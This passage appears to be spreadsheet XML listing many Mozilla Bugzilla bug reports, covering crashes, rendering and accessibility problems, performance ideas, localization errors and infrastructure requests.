    <t>Version 2005061608 (0.9a1)
I'm getting fairly constant crashes that look like:
0   com.apple.QD                   	0x916acc28 SetGWorld + 64
1   com.apple.AppKit               	0x939cf030 -[NSQuickDrawView dealloc] + 36
2   org.mozilla.navigator          	0x00604b38 -[ChildView dealloc] + 44
3   com.apple.AppKit               	0x9362dacc -[NSView release] + 200
4   com.apple.Foundation           	0x92886f1c __delayedPerformCleanup + 48
5   com.apple.CoreFoundation       	0x90771470 CFRunLoopTimerInvalidate + 400
6   com.apple.CoreFoundation       	0x9075df08 __CFRunLoopDoTimer + 272
This has happened several times now on different sites see talkbacks TB6754097G
and TB6816094M.
The stack traces seem very similar to those from bug 198101 which was closed
quite a while back.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-272076</t>
  </si>
  <si>
    <t>Update Extension:  Wizz RSS News Reader</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Title: - Wizz RSS News Reader
Version: - 0.2.2
Install link: - http://www.wizzcomputers.com/wizzrss.xpi
Description: - A very simple RSS news reader that installs as a Firefox
extension. After installation the news reader can be accessed from the Firefox
Tools menu.
Author: - Mike Kroger
Email: - mikek01@telkomsa.net
Works with Firefox 1.0
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mikek01</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-310708</t>
  </si>
  <si>
    <t>[BeOS]Font width cache to be implemented</t>
  </si>
  <si>
    <t>It is about last HUGE performance bottleneck in our GFX layer (there are others
but much less important)
For sites which use specual char alignment (like align=justify) )Mozilla
permanently calculates placement for each char and to calculate this placement
it should permanently ask char widths.
But in BeOS each call for String/CharWidth be it BView method or BFont method
actually calls app_server which brings HUGE overhead and slowdown. Like 5000
extra appserver calls for page.
Workaround is to create special cache where you storage widths for already
tested chars for given font. Actually it is not trivial tasksometimes very
non-trivial but even simplest implementation I tested here gives us fantastic
speed improvement.
Current price is that for each mFontMetrics object ( it uses additional memory 
-  float foo[OxFFFF]. Unfortunately.
With time and work it may be reduced and optimized but for me it is already
worth submitting and testing. Because even with simpicistic implementation
performance boost is fantastic.</t>
  </si>
  <si>
    <t>CORE-199897</t>
  </si>
  <si>
    <t>Some areas are not repainted when scrolling (misplaced pixel)</t>
  </si>
  <si>
    <t>Some areas are not repainted when smoothscroll is enabled. This is probably due
to roundoff errors. I tried the patch on attachment 118792 from bug 199159 but
it didn't make a difference. I will attach a screen capture to show the problem.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-454653</t>
  </si>
  <si>
    <t>Have maintenance cron jobs log to amo-developers list</t>
  </si>
  <si>
    <t>AMO meanwhile relies on a bunch of cron jobs to be run so the data it displays is up to date and its results are accurate. At the moment we have no possibility to tell when such a maintenance run was completed but it would help debugging possible problems.
The cron jobs in bin/ should log what they've done and the admin panel should provide a way to look at the log.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-350615</t>
  </si>
  <si>
    <t>Subscription options on feed preview page are not accessible</t>
  </si>
  <si>
    <t>The new inline subscription options on the feed preview page (Subscribe to this feed using [] Always use X to subscribe to feeds Subscribe Now) are not exposed to assistive technologies.  They do not expose any accessible objects at all.  I can tab to them but nothing shows up in Inspect32.
Steps to reproduce in Firefox 2 nightly build 2006-08-29:
1. Preview a feed such as http://www.mozillazine.org/contents.rdf
2. Tab to document
3. Tab to Subscribe to this feed using combo box.  Accessible Event Watcher shows no focus event.  Inspect32 still shows focus on the document.
4. Tab to Always use Live Bookmarks to subscribe to feeds.  No focus event focus is still on document.
5. Tab to Subscribe Now button.  No focus event focus is still on document.
This is not merely a focus-related problem.  If you move your cursor over any accessible control Inspect32 will show you its accessibility properties.  But if you move your cursor over any of these three controls in the header of the feed preview page Inspect32 shows nothing but the underlying document pane.  These controls simply do not exist in the accessibility hierarchy.</t>
  </si>
  <si>
    <t>TOOLKIT-891110</t>
  </si>
  <si>
    <t>OS.File</t>
  </si>
  <si>
    <t>[OS.File] Detect attempts to pass |undefined| to a C function</t>
  </si>
  <si>
    <t>Passing |undefined| to a C function is always an error. We should detect this and throw an intelligible error.
This can be done easily by patching function |declareFFI| of osfile_shared_allthreads.jsm.</t>
  </si>
  <si>
    <t>avinash</t>
  </si>
  <si>
    <t>TOOLKIT-491311</t>
  </si>
  <si>
    <t>Simplify Add to recent documents code in nsDownload::SetState</t>
  </si>
  <si>
    <t>Created attachment 375622
use SHARD_PATHW
(follow up to bug 310071)
The code to add a download to the recent documents list got more complicated then it needs to be because MSDN's documentation of SHAddToRecentDocs sucks a bit. This patch should achieve exactly the same.</t>
  </si>
  <si>
    <t>CORE-369528</t>
  </si>
  <si>
    <t>SVG code not handing surface endianness properly</t>
  </si>
  <si>
    <t>Created attachment 254186
respect endianness
SVG filters render oddly or not at all on OS-X/PPC.  Half of this is due to bug 367134 which affect Intel and PPC the rest has to do with how we interpret the information in the image surfaces.  We currently access it as a byte array with assumptions about the channel ordering but cairo stores surfaces as 32-bit pixel values in native endianness.
The attached patch uses macros added to thebes to decompose/recompose cairo packed pixel values.  The operations could be sped up with custom versions for the various endianness but lets get things working properly first.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-451309</t>
  </si>
  <si>
    <t>mount AUS data on khan</t>
  </si>
  <si>
    <t>There are AUS files on khan in /data/aus2/incoming/ and they are really old.  Rather than rsyncing files can we just the real files via NFS?</t>
  </si>
  <si>
    <t>CORE-415025</t>
  </si>
  <si>
    <t>Improve cycle collect scheduling</t>
  </si>
  <si>
    <t>It seems that we unconditionally cycle-collect every 10 seconds which does a GC.  If one has a lot of windows/tabs open this is still pretty slow (the GC part not the cycle collection).
This came up today because a user was complaining that with the browser completely idle but using a lot of VM every 10 seconds he gets a CPU spike and a lot of RSS churn which is preventing his CPU going idle and his hard drive spinning down.  Which is pretty bad  on a laptop (as in this case).
dbaron suggested that perhaps we should skip doing a CC when the 10 second timer fires if not much has happened since the last 10 second timer (for some definition of not much).  We might be able to use the existing branch callback for that determination and a multi-minute timer for last ditch CCs or something?</t>
  </si>
  <si>
    <t>CORE-488886</t>
  </si>
  <si>
    <t>SIP button gets shoved into the bottom right corner</t>
  </si>
  <si>
    <t>Created attachment 373353
screen shot
I haven't really found a pattern to it but some times the SIP button that controls the software keyboards winds up in the bottom left hand corner (rather than centered along the bottom).  As long as we continue to display this button we should keep it where users will expect it.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-897278</t>
  </si>
  <si>
    <t>Please re-image bld-centos6-hp-013</t>
  </si>
  <si>
    <t>This machine has come back from a developer and needs to be re-imaged.</t>
  </si>
  <si>
    <t>CORE-666399</t>
  </si>
  <si>
    <t>new Harmony syntax for generators</t>
  </si>
  <si>
    <t>Harmony specifies that generators have a distinguished header syntax. (We have to figure out in what modes we want to do this and in what modes we want to allow leaving out the *.)
Dave</t>
  </si>
  <si>
    <t>BUGZILLA-274951</t>
  </si>
  <si>
    <t>enhancements in bug list very hard to read - text has extremely low contrast</t>
  </si>
  <si>
    <t>The new striped UI causes difficulty distinguishing enhancements both on
grey-on-grey and white-on-grey rows.
If this is low contrast on my CRT then this is likely to be even worse on older
LCD screens.
Viewed in Mozilla build 2004111421 and Firefox 1.0 browsers.
Will attach example of the low contrast text.</t>
  </si>
  <si>
    <t>6jju4k002</t>
  </si>
  <si>
    <t>CORE-399262</t>
  </si>
  <si>
    <t>ASSERTION: NS_BLOCK_HAS_FIRST_LETTER_STYLE state out of sync with select::first-letter</t>
  </si>
  <si>
    <t>Created attachment 284253
testcase
See testcase I get this assertion in current debug build with it:
###!!! ASSERTION: NS_BLOCK_HAS_FIRST_LETTER_STYLE state out of sync: 'haveFirstL
etterStyle == ((mState &amp; NS_BLOCK_HAS_FIRST_LETTER_STYLE) != 0)' file c:/mozill
a/mozilla/layout/generic/nsBlockFrame.cpp line 6282</t>
  </si>
  <si>
    <t>TESTING-934555</t>
  </si>
  <si>
    <t>webapi test failures don't include test names</t>
  </si>
  <si>
    <t>When a webapi JS test fails the error string that appears in TBPL doesn't include the test name e.g.
TEST-UNEXPECTED-FAIL | marionette_test.py marionette_test.MarionetteJSTestCase.runTest | TimeoutException: socket.timeout
This is probably fallout from bug 879900.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-292466</t>
  </si>
  <si>
    <t>Dutch spelling error F7 key</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nl-NL rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 nl-NL rv:1.7.7) Gecko/20050414 Firefox/1.0.3
When you hit the F7 key there comes a window showing about Navigation with cursor.
In the Dutch version of Firefox there is a spelling mistake in the center of
the window the word webpagina*s At the * there seems to be some Chinese sign.
I don't know what it is but it does not belong there...
The correct word should be webpagina's
Reproducible: Always
Steps to Reproduce:
1. Get the Dutch Firefox version
2. Press F7
Actual Results:  
Spelling mistake
Expected Results:  
showing webpagina's instead of webpagina*s in the context
Dutch Firefox</t>
  </si>
  <si>
    <t>joeri.vlekken</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-145190</t>
  </si>
  <si>
    <t>espn.go.com - no recovery on CSS parse error for missing curly brace subsequent rules not applied</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:1.0.0+) Gecko/20020516
BuildID:    2002051608
In the URL above a browser sniffer JavaScript writes a link to an appropriate
style sheet.  For Netscape/Mozilla this one:
http://espn.go.com/insertfiles/css/mlb/font_nn.css
Here is the W3C validation output for this style sheet:
http://jigsaw.w3.org/css-validator/validator?uri=http%3A%2F%2Fespn.go.com%2Finsertfiles%2Fcss%2Fmlb%2Ffont_nn.css&amp;warning=1&amp;profile=css2
There are two parse errors:
* Line: 93
  Parse error - Unrecognized : }
* Line: 395 Context : .NEWSNFL
  Parse Error - .NEWSSUBNFL { font-family: times font-weight: bold font-size:
14px}
The second parse error turns out to be a missing right curly brace (}).
The two most important rules for the layout of this page (and all pages based on
this template) are .STATS and .SCHEDbold -- located below the 2nd parse error. 
When I make a local copy of the files (HTML and CSS) and correct the first error
on line 93 (removing the extra } ) Mozilla displays the page exactly the same
as it did before (incorrectly).  It is only when I fix the missing } error
(even if I don't fix the first) that the page displays correctly (that is
Mozilla applies the .STATS and .SCHEDbold rules).
The .STATS rule is the 3rd rule listed after the missing } and the .SCHEDbold
rule occurs a great deal below the missing }.  I think Mozilla ought to be
able to recover from this error after at most the next occurrence of a closing
brace (}).  In that case both the .STATS and .SCHEDbold rules would be
processed and applied to the page's layout making the best of a bad situation.
Both IE 6 and Netscape 4.79 display the local copy (and the online copy) of the
page correctly _before_ I correct either error.  In my local copy of the HTML I
hardcode the link to the style sheet so that the same one is used in any
browser.  The effect is still observable when I include the CSS file's contents
inline in a style tag (instead of using a link).
Reproducible: Always
Steps to Reproduce:
1.  Load the URL in Mozilla
2.  Observe that default serif font and default size are used in the table
instead of the styles from rules .STATS and .SCHEDbold.
Actual Results:  Mozilla does not (is not able to?) apply the .STATS and
.SCHEDbold rules.  (No recovery from parse error prevents it?)
Expected Results:  Mozilla makes the best of bad CSS and recovers from the
missing curly brace error as soon as it can and salvaging subsequent rules
including .STATS and .SCHEDbold (both of which occur far enough below the
missing } error to be salvaged).</t>
  </si>
  <si>
    <t>bugzilla4dave</t>
  </si>
  <si>
    <t>CORE-403425</t>
  </si>
  <si>
    <t>FindPrimaryFrameFor might not with floating first-letter</t>
  </si>
  <si>
    <t>See bug 403245.
I'm not sure whether it's worth trying to fix this for 1.9 but after that we definitely should...  Do we have a way to track that?</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-54172</t>
  </si>
  <si>
    <t>Chrome registry needs better methods of debugging</t>
  </si>
  <si>
    <t>Currently I can get content to register and to run no probs.
However i can *not* get a stand alone skin to work for an external package.
I haven't seen anyone do this yet. Every other external package uses existing
skins like modern etc . . . AFAICT
Now this wouldn't be such a big deal if there were ways to debug this.
Right now i get a stupid error.
CSSLoaderImpl::DidLoadStyle: Load of URL 'chrome://theme_builder/skin/' failed. 
Error code: 16389
It would be nice to see the real or resource path it is actually trying to load.
I have sliced this six ways till sunday and nothing I do is working!
It looks correct in my all-skins.rdf. I even jared up the skin directory in the
hopes i can get it to work.
No go.
We need more DEBUG printfs here.
*** Chrome Registration of package: Checking for contents.rdf at
resource:/chrome/theme_builder/theme_builder/content/
*** Chrome Registration of skin: Checking for contents.rdf at
jar:resource:/chrome/chameleon.jar!/skin/chameleon/theme_builder/
Is not good enough.
How about some real paths here so i can debug this.
Also is there a way to print out the chrome registry from js or something? (Like
a for in loop)
As to the mappings of where it thinks everything actually is located?
Stuff like this would be timelessly useful.
If anyone has gotten a skin to register and work for an external package w/out
using the existing skins please let me know how you did this.
I am filing a bug on this.
thank you
--pete</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-281735</t>
  </si>
  <si>
    <t>Investigate a few points in de-AT XPI</t>
  </si>
  <si>
    <t>I got the following message from Giacomo Magnini:
Hi Kairo!
Seems like things have largerly improved on the l10n side of the mozilla world! :)
Glad to see you're getting the needed attention and powers so finally someone
is taking care of us lately... Anyway back to some real life! :)
I've been playing around your LP and install.js since I was getting a curious
error with the italian LP for 1.8a3 and I've found a few things worth checking
for you.
First of all a few files have wrong permissions (I think):
de-AT.jar-&gt;messenger-&gt;start.html has rwxrwxrwx permissions. Shouldn't that be
rw-r--r--?
defaults/profile/AT/mimeTypes.rdf has rw-rw-rw-: again shouldn't that be rw-r--r--?
Digging deeper in your lp i've found a few files I don't have in my translation:
de-AT.jar-&gt;necko/redirect_loop.dtd
de-AT.jar-&gt;chatzilla/pref-irc.dtd (looks like you're translating an old or a
newer version of chatzilla not the one coming with the official 1.8a3 build. Am
I wrong?)
Another problem I've found (and which was my real pain with updating the LP) is
that in install.js you moved the registration of messenger-mapi into the
platforn-neutral section while leaving the special registration in the Win
specific section. AFAIK messenger-mapi is no longer in en-win.jar so the chrome
registration of xx-win.jar fails...
Hope all of this helps!
Cheers Giacomo.
-----------------
I gotta look through all those points when I got time...</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-313740</t>
  </si>
  <si>
    <t>Dragging bookmark from Safari to Camino removes bookmark rather than copies</t>
  </si>
  <si>
    <t>Spun off from bug 313338 (reporter never filed a follow-up but it seemed significant enough):
Also when transferring individual Bookmarks from Safari to the earlier Camino
version the transfer was a copy leaving the original with Safari. Now the
transfer is total eliminating the Bookmark from Safari.
If you drag a bookmark from Safari's manager to Camino's manager the bookmark is removed from Safari's manager.  When we go the other way we copy the bookmark into Safari and keep our original.
In 0.8.4 it was a copy both ways (although moving a bookmark from Safari to Camino resulted in the bookmark's URL being used as its name).  
Any chance this regressed due to changing bookmarks to the shared pasteboard format or whatever?</t>
  </si>
  <si>
    <t>CALENDAR-248884</t>
  </si>
  <si>
    <t>big calendar (ics more than 64k) is broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a2) Gecko/20040628
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a2) Gecko/20040628
big calendar (ics more than 64k) is broken
file is truncated on update to magical 64kB size
Reproducible: Always
Steps to Reproduce:
1. instal big calendar
2. update
Actual Results:  
file is broken
Expected Results:  
not truncate the file and display all events</t>
  </si>
  <si>
    <t>artiip</t>
  </si>
  <si>
    <t>SEAMONKEY-170960</t>
  </si>
  <si>
    <t>Mozilla doesn't start and the process hangs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.2b) Gecko/20020923
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.2b) Gecko/20020925
I can't start Mozilla at all. 
Reproducible: Always
Steps to Reproduce:
1. install mozilla
2. type 'mozilla &amp;'
3.
Actual Results:  
Nothing.
Expected Results:  
Mozilla should open the browser and mail window.
When I check the processes with top I can see something like this:
5460 skoumal    7  59    0   22M   15M sleep   0:00  0.00% mozilla-bin
If I compare it with working mozilla (20020923):
5401 skoumal    8  48    0   60M   54M sleep   2:00  2.15% mozilla-bin
the new mozilla is much smaller.
The output of truss:
read(19      i f   [   - n    $.. 128)     = 128
read(19      e c h o    D I S P.. 128)     = 128
read(19  S E R V E R L I S T   .. 128)     = 128
read(19  h o    M O Z I L L A _.. 128)     = 128
read(19             L I B R A R.. 128)     = 128
read(19  N _ P A T H = $ A D D O.. 128)     = 128
read(19  o z _ d e b u g \n    .. 128)     = 128
brk(0x0003D158)                                 = 0
brk(0x0003CF58)                                 = 0
brk(0x0003CD58)                                 = 0
read(19  R Y _ P A T H   A D D O.. 128)     = 128
brk(0x0003CB58)                                 = 0
read(19  f i\n\n e x i t   $ e x.. 128)     = 19
stat64(/usr/local/mozilla-2002092522/mozilla-bin 0xFFBEEC80) = 0
access(/usr/local/mozilla-2002092522/mozilla-bin 9) = 0
stat64(/bin/type 0xFFBEEAA0)                 = 0
stat64(/bin/type 0xFFBEEA10)                 = 0
access(/bin/type 9)                          = 0
brk(0x0003D358)                                 = 0
stat64(/opt/Acrobat5/bin/awk 0xFFBEE838)     Err#2 ENOENT
stat64(/usr/local/bin/awk 0xFFBEE838)        Err#2 ENOENT
stat64(/usr/local1/bin/awk 0xFFBEE838)       Err#2 ENOENT
stat64(/usr/local/pstill/awk 0xFFBEE838)     Err#2 ENOENT
stat64(/opt/SUNWsmtv/bin/awk 0xFFBEE838)     Err#2 ENOENT
stat64(/opt/SUNWut/bin/awk 0xFFBEE838)       Err#2 ENOENT
stat64(/usr/local/mozilla/awk 0xFFBEE838)    Err#2 ENOENT
stat64(/usr/local/samba/bin/awk 0xFFBEE838)  Err#2 ENOENT
stat64(/usr/local/teTeX/bin/awk 0xFFBEE838)  Err#2 ENOENT
stat64(/usr/local/sbin/awk 0xFFBEE838)       Err#2 ENOENT
stat64(/usr/local/kde/bin/awk 0xFFBEE838)    Err#2 ENOENT
stat64(/usr/local/gcqp/awk 0xFFBEE838)       Err#2 ENOENT
stat64(/opt/RICHPse/bin/awk 0xFFBEE838)      Err#2 ENOENT
stat64(/usr/dt/bin/awk 0xFFBEE838)           Err#2 ENOENT
stat64(/usr/openwin/bin/awk 0xFFBEE838)      Err#2 ENOENT
stat64(/usr/j2se/bin/awk 0xFFBEE838)         Err#2 ENOENT
stat64(/usr/xpg4/bin/awk 0xFFBEE838)         = 0
access(/usr/xpg4/bin/awk 9)                  = 0
pipe()                                          = 3 [4]
fork()                                          = 5470
close(4)                                        = 0
read(3  / u s r / l o c a l / b.. 128)      = 22
read(3 0xFFBEEC28 128)                        = 0
ioctl(3 TCGETA 0xFFBEEAAC)                    Err#22 EINVAL
ioctl(3 TCGETA 0xFFBEEB0C)                    Err#22 EINVAL
close(3)                                        = 0
waitid(P_PID 5470 0xFFBEEB08 WEXITED|WTRAPPED) = 0
stat64(/usr/local/bin/md5sum 0xFFBEEB30)     = 0
access(/usr/local/bin/md5sum 9)              = 0
stat64(core 0xFFBEE980)                      = 0
pipe()                                          = 3 [4]
fork()                                          = 5472
close(4)                                        = 0
read(3 0xFFBEE9E8 128)        (sleeping...)
read(3  3 c 1 2 8 b 9 b 6 6 b 4.. 128)      = 33
read(3 0xFFBEE9E8 128)                        = 0
ioctl(3 TCGETA 0xFFBEE86C)                    Err#22 EINVAL
ioctl(3 TCGETA 0xFFBEE8CC)                    Err#22 EINVAL
close(3)                                        = 0
waitid(P_PID 5472 0xFFBEE8C8 WEXITED|WTRAPPED) = 0
fork()                                          = 5474
waitid(P_PID 5474 0xFFBEECE0 WEXITED|WTRAPPED|WNOWAIT) (sleeping...)
and here it hangs.</t>
  </si>
  <si>
    <t>hana.skoumalova</t>
  </si>
  <si>
    <t>DIRECTORY-281140</t>
  </si>
  <si>
    <t>replace getpass() with something that supports &lt;8 chars for -w - prompts in CLUs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041231 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041231 Firefox/1.0
common.c uses getpass() for non-Win32 and non-Solaris to prompt for password
when using the -w - option.  This is an obsolescent interface on HP-UX because
it supports only up to 8 character passwords.
Reproducible: Always
Steps to Reproduce:
1. ldapsearch -s base -b  -D uid=testguydc=exampledc=com -w - objectclass=*
2. Enter bind password: testtesttest
Actual Results:  
ldap_simple_bind: Invalid credentials
Expected Results:  
LDAP_SUCCESS</t>
  </si>
  <si>
    <t>CORE-383030</t>
  </si>
  <si>
    <t>Negative values for -moz-border-radius/-moz-outline-radius should be ignored</t>
  </si>
  <si>
    <t>Created attachment 267046
testcase
See testcase the computed style of the various -moz-border-radius and -moz-outline-radius properties return a negative value.
According to the border-radius working draft negative values are not allowed.
With new border rewrite borders/outlines with negative radius values now look a bit strange.</t>
  </si>
  <si>
    <t>CORE-374415</t>
  </si>
  <si>
    <t>Cursor in the reply field of Gmail causes crash [@ PL_DHashTableOperate]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070317 Minefield/3.0a3pre ID:2007031721 [cairo]
repro:
open FF
open Gmail
open a mail and put the cursor in the reply field
Incident ID: 30362239
Stack Signature	PL_DHashTableOperate e583d331
Product ID	FirefoxTrunk
Build ID	2007031804
Trigger Time	2007-03-18 14:02:50.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	xpcom_core.dll + (00001624)
URL visited	https/mail.google.com/
User Comments	crash when I put the cursor in the reply field of Gmail
Since Last Crash	12274 sec
Total Uptime	12274 sec
Trigger Reason	Access violation
Source File Line No.	e:\builds\tinderbox\fx-trunk\winnt_5.2_depend\mozilla\xpcom\build\pldhash.c line 547
Stack Trace 	
PL_DHashTableOperate  [mozilla/xpcom/build/pldhash.c line 547]
nsPasswordManager::WriteSignonEntryEnumerator  [mozilla/toolkit/components/passwordmgr/base/nspasswordmanager.cpp line 1598]
nsComposerCommandsUpdater::Init  [mozilla/editor/composer/src/nscomposercommandsupdater.cpp line 248]
nsComposerCommandsUpdater::PrimeUpdateTimer  [mozilla/editor/composer/src/nscomposercommandsupdater.cpp line 263]
nsEditor::GetNextNodeImpl  [mozilla/editor/libeditor/base/nseditor.cpp line 3607]
regressionwindow:
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=1174195860&amp;maxdate=1174216919
-&gt; Bug 368773</t>
  </si>
  <si>
    <t>BUGZILLA-41303</t>
  </si>
  <si>
    <t>new email tech doesn't work with emailregexp</t>
  </si>
  <si>
    <t>The new email tech doesn't seem to work with emailregexp.  It just sends the 
email to login_name without adding emailsuffix.  Since bugzilla is running on 
a separate machine from our email server sendmail just reports 'user not 
found' or some such.
None of our bugzilla users have accounts on the actual bugzilla machine.  :)</t>
  </si>
  <si>
    <t>JRobertson</t>
  </si>
  <si>
    <t>FIREFOX-444763</t>
  </si>
  <si>
    <t>Use an unshared cache connection instead of a shared one</t>
  </si>
  <si>
    <t>In my simple test benchmark I was seeing a decrease in the number of ticks used for a sample location bar query that would find no results.  The decrease was about 7000 ticks from 90000 ticks to 83000 ticks.  Roughly a 7% win.
The downside to this is if someone were to open up another connection to the database in our process and does writes we can see a perf hit.  However add-ons (or anyone really) shouldn't be doing that.
cc'ing thunder just to make sure weave isn't doing that.</t>
  </si>
  <si>
    <t>THUNDERBIRD-231967</t>
  </si>
  <si>
    <t>Support for trace-malloc</t>
  </si>
  <si>
    <t>In an effort to help with any leaks I'm hooking up trace-malloc to tbird. I
have a patch that I have tested on windows but I'd love to get some Unix-land
testing before landing.
Patch on the way..</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-461449</t>
  </si>
  <si>
    <t>Escape should cancel TabsposÃ©</t>
  </si>
  <si>
    <t>STR:
1) Start TabsposÃ© in a window with 100+ tabs
2) Scream
3) Try hitting Esc
ER: TabsposÃ© stops
AR: Esc is impotent</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-325903</t>
  </si>
  <si>
    <t>Showcheckins.cgi not linkifying bug numbers.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
The description column on the showcheckins.cgi generated page is not correctly linking the bug numbers.  The numbers are getting turned into links correctly but the entities used to flag the '' symbols around the tags don't seem to be getting correctly interpreted.  The same appears to be happening with some nbsp characters at the bottom of the page.
I don't know enough about html/xml entities to spot the problem.
This started happening 2-3 weeks ago - sorry don't have the exact time.
Pages shows the same in IE or Firefox.
Reproducible: Always
Steps to Reproduce:
1.  Load the above URL.
Actual Results:  
Page shows with a typical checkin description of:
	Bug 312642 followup: move the click/mousedown event handlers to the bubbling phase to make dealing with anonymous content easier r=neil
Expected Results:  
The bug number in the above description should be a link not show the text of a link in HTML.
The actual table cell in the source for the above bug dscription looks like:
Bug A HREF=https://bugzilla.mozilla.org/show_bug.cgi?id=312642312642/A followup: move the click/mousedown event handlers to the bubbling phase to make dealing with anonymous content easier r=neil</t>
  </si>
  <si>
    <t>aardvarktm</t>
  </si>
  <si>
    <t>CORE-104903</t>
  </si>
  <si>
    <t>busy/I-beam cursor when invoking Page Setup dialog</t>
  </si>
  <si>
    <t>using 10/15 trunk build on Mac only:
1) launch netscape
2) File | Page Setup
look at the cursor. its in the busy state. when you hit Cancel
and invoke it again its fine.
I can't reproduce this all the time though but definitely happening
about 20 percent of the time..Simon also witnessed this in my
cube. IT took about 10 invokations of the Page Setup dialog to
get it to happen. and on one occasion we saw the I-beam cursor
show up in the Page Setup dialog.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-183508</t>
  </si>
  <si>
    <t>[AxPlugin] Hlink targetted links don't work</t>
  </si>
  <si>
    <t>GET operations initiated by controls via the Hlink API are not being done in the
proper target frame. The IHlinkFrame::Navigate impl in the plugin is not told
via the supplied IHlink object or other means what the targetted frame name is
so it always opens in the current frame.
This might be a matter of the plugin not implementing something such as the
barely documented ITargetFrame interface.</t>
  </si>
  <si>
    <t>CORE-276002</t>
  </si>
  <si>
    <t>Get/FormatLocalizedString should use nsXPIDLString</t>
  </si>
  <si>
    <t>This is just a minor code simplification.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-411188</t>
  </si>
  <si>
    <t>days-from-date of leap year fails</t>
  </si>
  <si>
    <t>If a user tries to get days-from-date from 2008-02-29 we return NaN instead of 13938.  XSmiles and formsPlayer both return the correct value.</t>
  </si>
  <si>
    <t>CORE-420640</t>
  </si>
  <si>
    <t>don't remove native menu items from parent unless we're sure they are in the parent</t>
  </si>
  <si>
    <t>Created attachment 306945
fix v1.0
Trying to remove a native Cocoa menu item from a menu that it isn't in will result in an internal inconsistency exception being thrown. I ran into this and crashed while stress-testing native menus in Thunderbird. Easy to find and fix thanks to our cocoa exception handling code!</t>
  </si>
  <si>
    <t>SEAMONKEY-376171</t>
  </si>
  <si>
    <t>Reading new newsgroup or mail messages is now a pain</t>
  </si>
  <si>
    <t>This is a regression from bug 365049.
STEPS TO REPRODUCE:
1)  Open mailnews
2)  Read some newsgroup or mail folder (call it A)
3)  Switch to a different newsgroup or mail folder (calls it B)
4)  Wait for a new mail or news messages in A (e.g. send yourself an e-mail)
5)  Once the messages arrive switch back to folder A
ACTUAL RESULTS:  The last message you read is at the bottom of the threadpane.  The new messages are out of sight and you have to scroll to them to see them.  This is particularly bad if the last message you looked at was an old message -- you may have to do a LOT of scrolling to get to the new messages.
OLD BEHAVIOR:  The first new message is at the bottom of the threadpane so you can start reading your new mail right away.
EXPECTED RESULTS (desired behavior):  The first new message is at the top of the threadpane so you can start reading your new mail right away and see as much of it as possible.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-440067</t>
  </si>
  <si>
    <t>Release Notes for Camino 1.6.2</t>
  </si>
  <si>
    <t>It's about that time...even though we (still) don't have build coverage we have a pretty good idea of what bugs will land so I'll try to get these done soon.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-373156</t>
  </si>
  <si>
    <t>Classes should be sorted in reverse order on view account page</t>
  </si>
  <si>
    <t>Currently classes (owners peers members) are sorted in reverse on the ViewAccount page (sorted as members peers owners). This should be corrected.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529030</t>
  </si>
  <si>
    <t>[or] 3.6 whatsnew/firstrun localization</t>
  </si>
  <si>
    <t>BUGZILLA-156564</t>
  </si>
  <si>
    <t>treat bug IDs as integers in RDF output</t>
  </si>
  <si>
    <t>Bug IDs are integers and should be flagged as such in the RDF output of buglist.cgi.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-380213</t>
  </si>
  <si>
    <t>Create a quality.mozilla.org Component in Bugzilla</t>
  </si>
  <si>
    <t>I am tracking feedback and issues on QMO right now through forums but would like to have a component added to Bugzilla so I can direct the community to writing bugs going forward.
Please add quality.mozilla.org as a Component under Websites (as we have done for planet.m.o and spreadfirefox.com).
Thanks!</t>
  </si>
  <si>
    <t>SEAMONKEY-517238</t>
  </si>
  <si>
    <t>Implement Minimal APIs needed for Enigmail.</t>
  </si>
  <si>
